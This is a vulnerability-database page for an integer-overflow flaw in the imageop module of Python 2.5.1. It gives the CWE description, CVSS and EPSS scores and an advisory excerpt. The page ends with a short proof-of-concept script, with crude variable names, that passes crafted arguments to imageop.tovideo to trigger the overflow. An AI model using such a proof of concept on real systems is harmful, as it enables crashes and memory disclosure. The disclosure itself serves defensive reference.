CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Multiple integer overflows in the imageop module in Python 2.5.1 and earlier allow context-dependent attackers to cause a denial of service (application crash) and possibly obtain sensitive information (memory contents) via crafted arguments to (1) the tovideo method, and unspecified other vectors related to (2) imageop.c, (3) rbgimgmodule.c, and other files, which trigger heap-based buffer overflows.
Integer Overflow or Wraparound The product performs a calculation that can
produce an integer overflow or wraparound when the logic
assumes that the resulting value will always be larger than
the original value. This occurs when an integer value is
incremented to a value that is too large to store in the
associated representation. When this occurs, the value may
become a very small or negative number.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
5.8
AV:N/AC:M/Au:N/C:P/I:N/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
15.27%
–
–
2022-03-13
–
–
15.27%
–
–
2022-04-03
–
–
15.27%
–
–
2023-03-12
–
–
–
3.76%
–
2023-04-02
–
–
–
4.35%
–
2023-05-07
–
–
–
4.99%
–
2023-06-11
–
–
–
5.71%
–
2023-07-16
–
–
–
5.56%
–
2023-08-06
–
–
–
3.73%
–
2023-08-20
–
–
–
3.24%
–
2023-09-24
–
–
–
3.96%
–
2023-11-05
–
–
–
4.05%
–
2023-12-10
–
–
–
4.17%
–
2024-01-14
–
–
–
4.7%
–
2024-02-25
–
–
–
4.21%
–
2024-03-31
–
–
–
4.62%
–
2024-06-02
–
–
–
5.11%
–
2024-06-16
–
–
–
5.12%
–
2024-07-28
–
–
–
6.17%
–
2024-12-22
–
–
–
8.23%
–
2025-03-09
–
–
–
8.23%
–
2025-01-19
–
–
–
8.23%
–
2025-03-09
–
–
–
8.23%
–
2025-03-18
–
–
–
–
8.6%
2025-03-18
–
–
–
–
8.6,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
source: https://www.securityfocus.com/bid/25696/info
Python's imageop module is prone to multiple integer-overflow vulnerabilities because it fails to properly bounds-check user-supplied input to ensure that integer operations do not overflow.
To successfully exploit these issues, an attacker must be able to control the arguments to imageop functions. Remote attackers may be able to do this, depending on the nature of applications that use the vulnerable functions.
Attackers would likely submit invalid or specially crafted images to applications that perform imageop operations on the data.
A successful exploit may allow attacker-supplied machine code to run in the context of affected applications, facilitating the remote compromise of computers.
#!/usr/bin/python
import imageop
sexshit = "a"*1603
evil = "p"*5241
connard = "s"*2000
supaire= "45"*65
print supaire
connard = "cool"
salope = "suceuse"
dtc = imageop.tovideo(sexshit,1,4461,-2147002257)
sexshit = "dtc"*52
print connard,supaire," fin de dump"